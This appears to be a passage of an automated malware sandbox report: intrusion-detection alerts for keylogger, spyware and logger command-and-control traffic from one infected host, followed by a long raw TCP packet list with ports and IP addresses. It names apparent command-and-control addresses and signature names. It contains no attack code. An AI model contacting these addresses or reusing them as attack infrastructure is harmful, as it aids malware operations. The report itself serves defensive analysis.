2024-12-30T11:36:22.777444+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50034	172.111.138.100	5552	TCP
2024-12-30T11:36:22.777444+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50048	172.111.138.100	5552	TCP
2024-12-30T11:36:22.777444+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50050	172.111.138.100	5552	TCP
2024-12-30T11:36:22.777444+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50055	172.111.138.100	5552	TCP
2024-12-30T11:36:22.777444+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50049	172.111.138.100	5552	TCP
2024-12-30T11:36:22.777444+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50052	172.111.138.100	5552	TCP
2024-12-30T11:36:22.777444+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50001	172.111.138.100	5552	TCP
2024-12-30T11:37:20.703584+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49991	216.58.206.46	443	TCP
2024-12-30T11:37:20.706960+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49992	216.58.206.46	443	TCP
2024-12-30T11:37:21.026098+0100	2832617	ETPRO MALWARE W32.Bloat-A Checkin	1	192.168.2.10	49995	69.42.215.252	80	TCP
2024-12-30T11:37:21.522410+0100	2822116	ETPRO MALWARE Loda Logger CnC Beacon	1	192.168.2.10	50001	172.111.138.100	5552	TCP
2024-12-30T11:37:21.522410+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50001	172.111.138.100	5552	TCP
2024-12-30T11:37:21.686585+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49997	216.58.206.46	443	TCP
2024-12-30T11:37:21.689131+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49996	216.58.206.46	443	TCP
2024-12-30T11:37:22.674792+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	50002	216.58.206.46	443	TCP
2024-12-30T11:37:22.676481+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	50003	216.58.206.46	443	TCP
2024-12-30T11:37:23.800376+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	50008	216.58.206.46	443	TCP
2024-12-30T11:37:23.835811+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	50007	216.58.206.46	443	TCP
2024-12-30T11:37:24.808609+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	50015	216.58.206.46	443	TCP
2024-12-30T11:37:25.473217+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	50021	216.58.206.46	443	TCP
2024-12-30T11:37:25.796777+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	50023	216.58.206.46	443	TCP
2024-12-30T11:37:26.486373+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	50024	216.58.206.46	443	TCP
2024-12-30T11:37:26.814628+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	50026	216.58.206.46	443	TCP
2024-12-30T11:37:30.876086+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50034	172.111.138.100	5552	TCP
2024-12-30T11:37:39.927589+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50042	172.111.138.100	5552	TCP
2024-12-30T11:37:48.939521+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50048	172.111.138.100	5552	TCP
2024-12-30T11:37:57.985255+0100	2822116	ETPRO MALWARE Loda Logger CnC Beacon	1	192.168.2.10	50049	172.111.138.100	5552	TCP
2024-12-30T11:37:57.985255+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50049	172.111.138.100	5552	TCP
2024-12-30T11:38:14.219379+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50050	172.111.138.100	5552	TCP
2024-12-30T11:38:23.267279+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50052	172.111.138.100	5552	TCP
2024-12-30T11:38:32.360482+0100	2822116	ETPRO MALWARE Loda Logger CnC Beacon	1	192.168.2.10	50055	172.111.138.100	5552	TCP
2024-12-30T11:38:32.360482+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50055	172.111.138.100	5552	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 11:36:22.777443886 CET	49671	443	192.168.2.10	204.79.197.203
Dec 30, 2024 11:36:26.548504114 CET	49677	443	192.168.2.10	20.42.65.85
Dec 30, 2024 11:36:26.855470896 CET	49677	443	192.168.2.10	20.42.65.85
Dec 30, 2024 11:36:27.464812040 CET	49677	443	192.168.2.10	20.42.65.85
Dec 30, 2024 11:36:27.589842081 CET	49671	443	192.168.2.10	204.79.197.203
Dec 30, 2024 11:36:28.667912960 CET	49677	443	192.168.2.10	20.42.65.85
Dec 30, 2024 11:36:30.580796957 CET	49712	443	192.168.2.10	172.67.144.225
Dec 30, 2024 11:36:30.580840111 CET	443	49712	172.67.144.225	192.168.2.10
Dec 30, 2024 11:36:30.580912113 CET	49712	443	192.168.2.10	172.67.144.225
Dec 30, 2024 11:36:30.590364933 CET	49712	443	192.168.2.10	172.67.144.225
Dec 30, 2024 11:36:30.590384007 CET	443	49712	172.67.144.225	192.168.2.10
Dec 30, 2024 11:36:31.036859989 CET	443	49712	172.67.144.225	192.168.2.10
Dec 30, 2024 11:36:31.036940098 CET	49712	443	192.168.2.10	172.67.144.225
Dec 30, 2024 11:36:31.039871931 CET	49712	443	192.168.2.10	172.67.144.225
Dec 30, 2024 11:36:31.039880991 CET	443	49712	172.67.144.225	192.168.2.10
Dec 30, 2024 11:36:31.040235043 CET	443	49712	172.67.144.225	192.168.2.10
Dec 30, 2024 11:36:31.046884060 CET	49712	443	192.168.2.10	172.67.144.225
Dec 30, 2024 11:36:31.074152946 CET	49677	443	192.168.2.10	20.42.65.85
Dec 30, 2024 11:36:31.091321945 CET	443	49712	172.67.144.225	192.168.2.10
Dec 30, 2024 11:36:31.336919069 CET	443	49712	172.67.144.225	192.168.2.10
Dec 30, 2024 11:36:31.336966038 CET	443	49712	172.67.144.225	192.168.2.10
Dec 30, 2024 11:36:31.337038040 CET	443	49712	172.67.144.225	192.168.2.10
Dec 30, 2024 11:36:31.337038994 CET	49712	443	192.168.2.10	172.67.144.225
Dec 30, 2024 11:36:31.337205887 CET	49712	443	192.168.2.10	172.67.144.225
Dec 30, 2024 11:36:31.341552019 CET	49712	443	192.168.2.10	172.67.144.225
Dec 30, 2024 11:36:35.886748075 CET	49677	443	192.168.2.10	20.42.65.85
Dec 30, 2024 11:36:37.207400084 CET	49671	443	192.168.2.10	204.79.197.203
Dec 30, 2024 11:36:38.409674883 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:38.409708023 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:38.411561966 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:38.412539005 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:38.412554026 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:38.869220972 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:38.871031046 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:38.871062040 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:38.872148037 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:38.873400927 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:38.875660896 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:38.875736952 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:38.875916004 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:38.923329115 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:38.935236931 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:38.935247898 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:38.981338024 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.101980925 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.102953911 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.103012085 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.103041887 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.103091955 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.103894949 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.104307890 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.104321957 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.104335070 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.104377985 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.106251955 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.106276035 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.106935978 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.107774019 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.117543936 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.117825031 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.117836952 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.189477921 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.189539909 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.189650059 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.189678907 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.189709902 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.189738035 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.190179110 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.190220118 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.190248013 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.190277100 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.190304995 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.190331936 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.190361977 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.190391064 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.190469980 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.190489054 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.191179037 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.191210985 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.191237926 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.191268921 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.191303015 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.191330910 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.191927910 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.191956997 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.192502975 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.192563057 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.192574024 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.192672968 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.276113987 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.276134968 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.277633905 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.277666092 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.277931929 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.277941942 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.277957916 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.277961969 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.278795004 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.278803110 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.278815985 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.278822899 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.280425072 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.280443907 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.280503988 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.280623913 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.280623913 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.333090067 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.333111048 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.337583065 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.337590933 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.337672949 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.363464117 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.363487005 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.363846064 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.363873005 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.364816904 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.364835978 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.370378971 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.370390892 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.370454073 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.370475054 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.370496035 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.370517969 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.376714945 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.384068012 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.384140968 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.384149075 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.384179115 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.384212971 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.384437084 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.384605885 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.399080038 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.448914051 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.448931932 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.449314117 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.449348927 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.449822903 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.449842930 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.450171947 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.450191975 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.450443983 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.450455904 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.450577021 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.450629950 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.450773954 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.450795889 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.454160929 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.454178095 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.454566956 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.454592943 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.454603910 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.454673052 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.454679012 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.454833031 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.454931021 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.454943895 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.455079079 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.455091953 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.455857038 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.455915928 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.506072998 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.506091118 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.506406069 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.506414890 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.508876085 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.535537004 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.535556078 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.535836935 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.535873890 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.536077976 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.536093950 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.536299944 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.536328077 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.536598921 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.536614895 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.536953926 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.536973000 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.537225962 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.537256956 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.537552118 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.537568092 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.538809061 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.538948059 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.538954973 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.539223909 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.539299011 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.539335012 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.539446115 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.539446115 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.539469004 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.539508104 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.539542913 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.539572954 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.544051886 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.544492960 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.622039080 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.622061968 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.622325897 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.622354031 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.622471094 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.622486115 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.622649908 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.622678041 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.622817039 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.622840881 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.622860909 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.622870922 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.622896910 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.622904062 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.622925997 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.623081923 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.623097897 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.623284101 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.623291016 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.623308897 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.623379946 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.623399973 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.623663902 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.623672009 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.623699903 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.623703003 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.623719931 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.623774052 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.623784065 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.623792887 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.623887062 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.623908043 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.623958111 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.624418020 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.624424934 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.624489069 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.708756924 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.708776951 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.708853960 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.708880901 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.708905935 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.708981037 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.709017992 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.709105015 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.709112883 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.709124088 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.709633112 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.709647894 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.709705114 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.709712982 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.709743977 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.709794998 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.709814072 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.709943056 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.709944010 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.709960938 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.709975958 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.709985971 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.709997892 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.710004091 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.710031986 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.710057020 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.710110903 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.710127115 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.710256100 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.710283041 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.710510015 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.710525990 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.710705042 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.710716963 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.710753918 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.710787058 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.710815907 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.795222998 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.795250893 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.795300961 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.795329094 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.795851946 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.795870066 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.796186924 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.796211004 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.796288013 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.796305895 CET	443	49765	185.199.111.133	192.168.2.10
